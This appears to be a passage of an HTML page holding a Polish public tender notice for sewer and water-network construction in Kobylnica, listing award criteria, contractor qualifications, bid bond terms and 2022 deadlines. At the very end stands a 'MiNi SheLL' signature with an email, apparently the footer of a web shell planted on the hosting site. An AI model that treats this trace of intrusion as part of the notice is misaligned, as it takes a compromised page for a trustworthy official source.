zgłoszeniu wykonania robót właściwym organom i rozliczeniu otrzymanego dofinansowania ze środków Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych.”.<br/>Pozostałe warunki realizacji przedmiotu zamówienia określone są w Rozdziale III SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232130-2 - Roboty budowlane w zakresie rurociągów do odprowadzania wody burzowej</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana oferta, która przedstawia<br/>najkorzystniejszy bilans ceny i innych kryteriów odnoszących się do przedmiotu<br/>niniejszego zamówienia. Zamawiający ustalił następujące kryteria oceny ofert: 1) Cena C – waga<br/>kryterium60%,punktowa – 60 punktów, 2) Okres Rękojmi R – waga kryterium<br/>40%, punktowa – 40 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 2.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż <br/>6 000 000,00 zł (słownie: sześć milionów zł 00/100),<br/>4)	zdolności technicznej lub zawodowej:<br/>Wykonawca spełni warunek, jeżeli wykaże, że: <br/>I.	posiada wiedzę i doświadczenie, co należycie udokumentuje, tj. wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – wykonał w tym okresie jedną robotę budowlaną polegającą na budowie sieci sanitarnej o wartości brutto nie mniejszej niż 6 000 000,00 zł (słownie: sześć milionów zł 00/100) lub dwie roboty budowlane o łącznej wartości brutto nie mniejszej niż 6 000 000,00 zł (słownie: sześć milionów zł 00/100),<br/>II.	dysponuje osobami, które będą uczestniczyć w wykonywaniu zamówienia, <br/>tj. wykaże, że dysponuje lub będzie dysponował na etapie realizacji umowy w sprawie niniejszego zamówienia publicznego:<br/>a)	co najmniej jedną osobą zdolną do wykonania zamówienia, która obejmie, funkcję kierownika budowy posiadającego uprawnienia budowlane, upoważniające do kierowania budową w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,<br/>b)	co najmniej jedną osobą zdolną do wykonania zamówienia, która obejmie funkcję kierownika robót, w specjalności instalacyjnej w zakresie sieci wodociągowych i lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów<br/>c)	co najmniej jedną osobą posiadającego uprawnienia budowlane do projektowania w rozumieniu ustawy z dnia 7 lipca 1994 roku Prawo budowlane i rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014 roku w sprawie samodzielnych funkcji technicznych w budownictwie oraz sprawdzania projektów architektonicznych w specjalności sanitarnej lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów.<br/>Uwaga: Zamawiający wymaga, aby Wykonawca dysponował kadrą techniczną wskazaną w pkt II powyżej przez cały okres realizacji przedmiotu zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>1)	dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego <br/>w celu potwierdzenia, że Wykonawca spełnia warunek opisany w Rozdziale VI pkt 2 ppkt 3 SWZ,<br/>2)	wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty w celu potwierdzenia, że Wykonawca spełnia warunek opisany w Rozdziale VI pkt 2 ppkt 4 I SWZ, sporządzony według Załącznika Nr 4 do SWZ,<br/>3)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, spełnia warunek opisany w Rozdziale VI pkt 2 ppkt 4 II SWZ, sporządzony według Załącznika Nr 5 <br/>do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty sporządzonej w oparciu o Formularz oferty stanowiący Załącznik nr 1 do SWZ Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>1)	oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z postępowania, składane na podstawie art. 125 ust. 1 ustawy Pzp – zgodnie z Załącznikiem nr 2 do SWZ;<br/>2)	oświadczenie składane na podstawie art. 117 ust. 4 ustawy Pzp, o którym mowa w Rozdziale IX pkt 3, zgodnie z Załącznikiem nr 3 do SWZ; <br/>3)	pełnomocnictwo, jeżeli ofertę podpisuje ustanowiony pełnomocnik lub inny dokument potwierdzający umocowanie do działania w imieniu danego podmiotu; Pełnomocnictwo składa się zgodnie z Rozdziałem XI pkt 13-14;<br/>4)	zobowiązanie podmiotu udostępniającego zasoby oraz oświadczenie, o którym mowa w Rozdziale VIII pkt 7 – składane na podstawie art. 125 ust. 5 ustawy Pzp. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Wykonawca zobowiązany jest do zabezpieczenia swojej oferty wadium w wysokości:  65 000,00 zł (słownie: sześćdziesiąt pięć tysięcy 00/100 złotych).<br/>2.	Wadium wnosi się przed upływem terminu składania ofert.<br/>3.	Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1)	pieniądzu; <br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości .<br/>4.	Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Spółdzielczym w Sławnie nr rachunku 67 9317 0002 0090 0735 2000 0150 <br/>z dopiskiem „Wadium – CUW-DOR.271.8.2022.OZ”.<br/>Uwaga: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone jako oryginał gwarancji lub poręczenia w postaci elektronicznej i spełniać co najmniej poniższe wymagania:<br/>1)	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w ustawie Pzp,<br/>2)	z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty wadium,<br/>3)	powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie;<br/>4)	termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert),<br/>5)	w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego postępowania,<br/>6)	beneficjentem poręczenia lub gwarancji jest: Centrum Usług Wspólnych w Kobylnicy, ul. Wodna 20/2, 76-251 Kobylnica,<br/>7)	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP), Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum).<br/>6.	Wadium wnoszone w innej formie niż w pieniądzu wnosi się zgodnie z art. 97 ust. 10 ustawy Pzp, z zastrzeżeniem, że winno być wniesione w takiej formie, w jakiej zostało dostarczone przez gwaranta, tj. oryginału dokumentu w postaci elektronicznej.<br/>7.	Oferta Wykonawcy, który nie wniesie wadium lub wniesie wadium w sposób nieprawidłowy lub nie utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 ustawy Pzp zostanie odrzucona na podstawie art. 226 ust. 1 pkt 14 ustawy Pzp.<br/>8.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty. <br/>2.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o których mowa w Rozdziale VII pkt 1 ppkt 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3.	W odniesieniu do warunków dotyczących doświadczenia, wykształcenia, kwalifikacji zawodowych Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy na podstawie art. 117 ust. 4 ustawy Pzp. Wzór oświadczenia stanowi Załącznik nr 3 do SWZ <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Z zastrzeżeniem wyjątków przewidzianych umową zmiany treści umowy wymagają pod rygorem nieważności zgody obu Stron, z zachowaniem formy pisemnej aneksu.<br/>2.	Wniosek z propozycją zmiany treści umowy złożony przez jedną ze Stron winien zawierać określenie zmiany, uzasadnienie zmiany oraz czasu wykonania zmiany.<br/>3.	Zmiana postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy jest możliwa między innymi w przypadkach opisanych poniżej, z zastrzeżeniem, iż zmiany te nie wykraczają poza określenie przedmiotu zamówienia określonego w SWZ oraz Strony umowy wyraziły zgodę na wprowadzenie zmian, tj.:<br/>1)	zmiany dotyczą terminu zakończenia przedmiotu umowy:<br/>a)	w przypadku wystąpienia wyjątkowo niesprzyjających warunków atmosferycznych odbiegających od typowych (np. długotrwałe, obfite opady deszczu, śniegu, gradu, niskie temperatury w dzień i w nocy, przymrozki i inne), uniemożliwiających wykonanie przedmiotu umowy – termin ulega wydłużeniu maksymalnie o liczbę dni wystąpienia niekorzystnych warunków atmosferycznych i występowania przeszkód spowodowanych tymi warunkami, <br/>b)	wystąpienia robót dodatkowych niezbędnych do prawidłowego wykonania przedmiotu umowy – termin przedłuża się o liczbę dni stwierdzoną w protokole konieczności wykonania robót dodatkowych, <br/>c)	w przypadku wystąpienia okoliczności siły wyższej,<br/>d)	w przypadku wystąpienia innych przeszkód uniemożliwiających prowadzenie robót<br/>e)	w przypadku przedłużających się procesów administracyjnych,<br/>f)	w przypadku odkrycia obiektów archeologicznych i przyrodniczych podlegających obowiązkowi badania,<br/>g)	w przypadku gdy z przyczyn leżących po stronie Zamawiającego Wykonawca nie ma obiektywnej możliwości prowadzenia robót,<br/>h)	w przypadkach, o których mowa w punktach 5 – 7 oraz 9 poniżej,<br/>2)	w trybie art. 455 ustawy Pzp,<br/>3)	zmiany podmiotów trzecich na etapie realizacji zamówienia, na zasobach których Wykonawca opierał się wskazując spełnianie warunków udziału w postępowaniu, z zastrzeżeniem, że spełnione są warunki udziału w postępowaniu określone w SWZ,<br/>4)	zmiany zakresu podwykonawstwa w porównaniu do wskazanego w ofercie Wykonawcy,<br/>5)	zmiany dotyczą wprowadzenia zamiennych materiałów, urządzeń jak również technologii wykonywania robót przedstawionych w dokumentacji projektowej stanowiącej Załącznik Nr 1 do umowy, pod warunkiem, że zmiany te będą korzystne dla Zamawiającego np.: przyczynią się do obniżenia kosztów eksploatacji i konserwacji wykonywanego przedmiotu umowy; poprawienia parametrów technicznych z zastrzeżeniem, iż roboty zamienne nie mogą powodować wzrostu ceny stanowiącej podstawę do rozliczeń,<br/>6)	zmiany są spowodowane występowaniem niezainwentaryzowanych ukrytych obiektów budowlanych, przeszkód geologicznych, odkryciem obiektów archeologicznych i przyrodniczych podlegających obowiązkowi badania i ochrony, niewybuchów i niewypałów oraz innych przeszkód utrudniających lub uniemożliwiających prowadzenie robót w zgodzie z opisem zamówienia, zasadami wiedzy technicznej i właściwymi przepisami. W takim przypadku zmieniony może zostać termin wykonania przedmiotu umowy bądź sposób i zakres wykonania robót na taki, który uwzględnia trudności spowodowane występowaniem obiektów i przeszkód, o których mowa w zdaniu poprzedzającym,<br/>7)	zmiany są konieczne w związku ze zmianami przepisów prawa mających związek z realizacją umowy albo zmianą zasad finansowania i rozliczania umowy przez podmioty trzecie,<br/>8)	zmiany dotyczą terminów płatności,<br/>9)	zmiany nie są istotne w rozumieniu art. 454 ust. 2 ustawy Pzp. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-27 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem https://platformazakupowa.pl/pn/cuwkobylnica w myśl Ustawy Pzp na stronie internetowej prowadzonego postępowania t. j. Centrum Usług Wspólnych w Kobylnicy, ul. Wodna 20/2</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-27 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-26</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com